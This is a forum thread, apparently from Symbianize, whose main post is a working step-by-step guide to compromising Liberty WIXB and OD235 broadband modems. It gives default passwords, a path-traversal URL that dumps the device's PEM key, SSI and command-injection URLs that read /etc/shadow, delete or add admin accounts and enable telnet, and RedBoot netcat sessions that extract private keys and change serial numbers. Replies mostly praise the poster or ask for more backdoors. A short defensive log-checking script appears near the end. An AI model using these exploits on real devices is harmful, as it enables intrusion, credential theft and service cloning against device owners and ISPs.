Symbianize Forum


BAGSAKAN 2015 ! - cr4mfs sy

Status
Not open for further replies.

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Does this work on Smart, sir? I mean on the Smart DV? Thanks in advance for the answer.
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Alex is the only master, not cramfs. Most of what cramfs knows he just leeched from his buddies, including the RedBoot he is so proud of. The truth is that long before cramfs learned about the PEM key dump on the Tribe, natalia had already known it for a long time. In short, cramfs courted him for the command, but Alex, aka natalia gazanova, is shrewd, so what he gave was a dump that sometimes fails, which the scammer king immediately bragged about and made money from. There is a deep story behind why Alex is annoyed with him. So for me cramfs is a leecher too.. don't fool yourself cramfs, you know what I'm saying is true hahahahaha:lol::rofl::lol: maybe you'll say again that we're envious of you??? I have nothing to envy you for

Is that Alex you're talking about also on his MediaTek team, bro ? ? ?
Or are they friends who just had a falling-out ? ? ?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

BM, thanks :D
 
Updated now !!

Everything is there now
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Well, the time will come when..... " ALL PORTS WILL BE CLOSED ". Only someone who knows the architecture and software of the embedded device, who can say " OPEN SESAME ", will be able to access it. Whoever can do this we can call a true MASTER of Symbianize.

Guys, maybe we can have a ceasefire for now, okay! :pray Nothing personal..... just work. :salute: Leave cramfs alone for now. :salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

It is unlikely that the ports will be closed, because the telecoms would lose access to the broadband units. Changing ports and other security measures is still possible.
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

I wish I had a wi-tribe too.. :lol:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

LIBERTY WIXB-175x204: how do I reconnect? Telnet is already open... please share a tutorial, sir... thanks for this thread of yours....
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Mahusay !! The best Thread ever !!
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Boss, do you also have a back door for the OX230? Thanks in advance for sharing :salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Nice, so there's a BAGSAKAN here too. Hehehe.... I mean a bombshell, nice one cramfs. :thumbsup: :salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Can telnet also be enabled on Smart's v7?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Nice, you're good, TS :salute::salute::salute::salute::salute: thanks a lot
 
LIBERTY WIXB-175x204 PEMKEY GRABBING

STEP # 1

In the Mozilla browser, open the victim's IP. LOG IN using one of these possible credentials:

witribe
witribe123
witribe12345

STEP # 2

Press the CTRL + SHIFT key. Click the Debugger tab. On the left side you will see sysconf.cgi. Hover your cursor over sysconf.cgi to see the URL and reveal the SID. As for the timestamp, the default timestamp that appears in your address bar is enough.

View attachment 1040555

STEP # 3

Open a NEW TAB, then copy and paste this exploit. Fill in the appropriate IP address, SID and TIMESTAMP, then press ENTER and the magical PEMKEY will appear.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=put the SID here&timestamp=put the timestamp here

View attachment 1040557


OPTIONAL:
FOR THOSE WHO KNOW HOW TO USE TAMPER DATA, THIS WAY IS EASIER.

1. LOG IN TO THE VICTIM'S GUI.

2. Go to the Personalize tab > Device Name. Enter FOO as the New Device Name. Do not click APPLY yet.

3. Open Tamper Data, click START, then click APPLY.

4. Uncheck Continue Tampering, then click Tamper.

5. Then click OK.

View attachment 1040562


6. Find the GET, right-click it and choose Replay Browser.

View attachment 1040560

7. This is what should appear after you choose Replay Browser. You will see Personalize_password there. Replace it with ../../tmp/var/client.pem, then click OK. It will then open a new tab, and the PEM key will appear there.

View attachment 1040565


=======================================================================
BACKDOOR COMMANDS
=======================================================================

Tamper Data Method:

1. Just follow the Tamper Data method via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again, find the GET, right-click it, then choose Replay Browser. Personalize_password will appear there; replace it with ../../etc/hosts, then click OK.

6. TELNET IS NOW ENABLED




====================================================
COMPLETE REDBOOT COMMAND
====================================================

BEFORE ANYTHING ELSE, I WANT TO SAY THAT I DID NOT LEECH THIS FROM ANYONE. I WILL SHOW HERE THE PROCESS BY WHICH I OBTAINED THE REDBOOT COMMANDS. HERE'S THE PROOF.

1. USE THE CERT-WRITER.EXE AND SNWRITER.EXE TOOLS FROM THE BM622M.

2. DOWNLOAD WIRESHARK

3. NOW CLOSE ALL BROWSERS AND RUNNING APPLICATIONS SO THAT WIRESHARK DOES NOT PICK THEM UP.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. IN WIRESHARK, CHOOSE THE INTERFACE: SELECT THE LAN INTERFACE, THEN CLICK START. OPEN CERT-WRITER.EXE, THEN CLICK CONNECT, THEN UPLOAD A CERTIFICATE AND PRIVATE KEY. THIS IS SO YOU CAN SEE IN WIRESHARK HOW THE PEMKEY IS WRITTEN.

6. AFTER THE PEM AND KEY ARE UPLOADED, CLICK VERIFY SO THAT YOU DUMP THE PEM AND KEY IN TURN AND SEE IT IN WIRESHARK.

7. GO TO WIRESHARK AND LOOK FOR 192.168.15.1 THERE.
IMAGE:
View attachment 1040791

8. RIGHT-CLICK 192.168.15.1, THEN CHOOSE "FOLLOW TCP STREAM". YOU WILL SEE THAT IT RECORDED THE REDBOOT COMMANDS AND OUTPUT. YOU CAN ALSO SAVE IT.

IMAGE:
View attachment 1040794


"FOR EVERYONE'S INFORMATION, THE FORMAT FOR EXTRACTING THE PEM AND KEY IS DIFFERENT FOR WI-TRIBE AND SMART."

SMART DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE----- 
-----END RSA PRIVATE KEY-----


WI-TRIBE DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

Code:
RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk


ALL OF THIS HAS A BASIS. NORMALLY YOU CAN GET INTO REDBOOT ON PORT 9000 ONLY. THIS CAN BE DONE ONLY OVER A LAN CONNECTION. THAT HAS BEEN WELL KNOWN TO US FOR A LONG TIME.

Code:
EXAMPLE: 
telnet 192.168.15.1 9000

redboot>


AS FOR RUNNING REDBOOT INSIDE TELNET, WHICH CAN BE DONE OVER BOTH WAN AND LAN, I HAVE A BASIS FOR HOW I GOT IT, AND I DID NOT LEECH IT FROM ANYONE.

THE LOGIC CAN BE FOUND INSIDE THE /init.d/boot_update File Directory.

View attachment 1040797


================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================

Code:
BROWSER BACK DOOR OD235
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+cat+/etc/shadow

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1
REPLACE /etc/shadow depending on what you want to see.

CHANGE ADMIN LOGIN ON THE OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

Code:
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

CHANGE ADMIN LOGIN ON THE OD235 ONLY !!
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;
Code:
fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
I TAKE NO RESPONSIBILITY FOR WHATEVER HAPPENS TO YOUR DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
I TAKE NO RESPONSIBILITY IF THIS IS USED ILLEGALLY. USE IT AT YOUR OWN RISK



ENJOY :)

CR4MFS SY
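
The requests in the post above share three shapes: a `..` segment in `page`, shell syntax in `mon_diag_addr`, and an SSI `#exec` directive in a form field. The Python check below is an added example for defenders reviewing CPE web logs, not part of the original post. The host, `sid` values and the `device_name` field name are constructed, and it assumes `mon_diag_addr` should only ever hold a hostname or IP address.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")    # a ".." path segment
SSI = re.compile(r"<!--\s*#\s*exec", re.IGNORECASE)   # server-side include directive
HOST_OK = re.compile(r"[A-Za-z0-9.:-]{1,253}")        # assumed shape of a diagnostic target

def classify(url, body=""):
    """Return findings for one request to sysconf.cgi (query string plus form body)."""
    parts = urlsplit(url)
    if not parts.path.endswith("/cgi-bin/sysconf.cgi"):
        return []
    findings = []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    for name, value in pairs:
        value = unquote(value)  # second decode pass catches double-encoded input
        if name == "page" and TRAVERSAL.search(value):
            findings.append("traversal:page")
        if name == "mon_diag_addr" and not HOST_OK.fullmatch(value):
            findings.append("injection:mon_diag_addr")
        if SSI.search(value):
            findings.append("ssi:" + name)
    return findings

# Constructed sample requests (host, sid, timestamp and device_name are made up).
BASE = "http://cpe.example/cgi-bin/sysconf.cgi"
SAMPLES = [
    (BASE + "?page=ajax.asp&action=request&sid=abc&timestamp=1", ""),
    (BASE + "?page=../../tmp/var/client.pem&action=request&sid=abc&timestamp=1", ""),
    (BASE + "?page=%252e%252e%252fetc%252fhosts&action=request&sid=abc", ""),
    (BASE + "?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_addr=1+%26+id", ""),
    (BASE + "?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_addr=192.0.2.10", ""),
    (BASE, "device_name=%3C%21--%23exec+cmd%3D%22true%22--%3E"),
]

def scan(samples=SAMPLES):
    """Map each sample's index to its findings, keeping only flagged requests."""
    hits = {}
    for i, (url, body) in enumerate(samples):
        found = classify(url, body)
        if found:
            hits[i] = found
    return hits

if __name__ == "__main__":
    for idx, found in scan().items():
        print(idx, SAMPLES[idx][0], found)
```

The same three rules can be applied as input validation in front of the CGI: resolve `page` against a fixed allowlist of templates, validate the diagnostic target before it reaches a shell, and never render user-supplied fields through an SSI-enabled template.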





Thanks master, I'll spread this on the world wide web heheehe :)
 
What if the unit is a DV-235T?... will this work?.. thanks
 
The thread really is named Bagsakan :lol:

How do you reconnect a Liberty?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Boom, awesome :)
 